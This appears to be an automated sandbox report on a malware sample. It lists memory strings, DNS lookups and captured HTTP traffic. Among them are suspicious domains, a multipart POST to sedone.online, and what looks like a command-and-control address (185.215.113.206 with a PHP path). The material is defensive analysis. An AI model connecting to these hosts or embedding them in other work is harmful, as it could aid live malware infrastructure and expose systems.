"://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: color-mix(in srgb, currentColor 9%, transparent)://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: chrome.exe, 00000010.00000003.3109370950.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3108482831.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3107711825.000044C000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000010.00000003.3109370950.000044C000474000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3108482831.000044C000FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3107711825.000044C000390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: getCanStageUpdates - unable to apply updates because another instance of the application is already handling updates for this installation.UpdateService.canUsuallyCheckForUpdates - unable to automatically check for updates, the option has been disabled by the administrator.You must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3371532481.00000269E47A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000003.3371532481.00000269E47A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000027.00000002.3465100253.00000269DBB2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000027.00000002.3465100253.00000269DBB2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000027.00000002.3465100253.00000269DBB2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: drive-connect.cyou
Source: global traffic	DNS traffic detected: DNS query: se-blurry.biz
Source: global traffic	DNS traffic detected: DNS query: zinc-sneark.biz
Source: global traffic	DNS traffic detected: DNS query: dwell-exclaim.biz
Source: global traffic	DNS traffic detected: DNS query: formy-spill.biz
Source: global traffic	DNS traffic detected: DNS query: covery-mover.biz
Source: global traffic	DNS traffic detected: DNS query: dare-curbys.biz
Source: global traffic	DNS traffic detected: DNS query: print-vexer.biz
Source: global traffic	DNS traffic detected: DNS query: impend-differ.biz
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.twentygr20sb.top
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: sedone.online
Source: global traffic	DNS traffic detected: DNS query: tacitglibbr.biz
Source: global traffic	DNS traffic detected: DNS query: twentygr20sb.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: youtube.com
Source: global traffic	DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic	DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: example.org
Source: global traffic	DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic	DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic	DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic	DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic	DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----N79HDBSJMYM7YUS0R1NYUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: sedone.onlineContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: cd39094ad6.exe, 00000015.00000002.3230900745.000000000088E000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp, cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/#
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/J
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/P
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpPR
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSQ
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpU
Source: cd39094ad6.exe, 00000015.00000002.3230900745.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpltipart/x-byteranges
Source: cd39094ad6.exe, 00000015.00000002.3230900745.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/i
Source: cd39094ad6.exe, 00000022.00000002.3390011704.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/s7
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 00000010.00000003.3097437937.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103175400.000044C000764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3103002890.000044C000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136584844.000010A0003C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
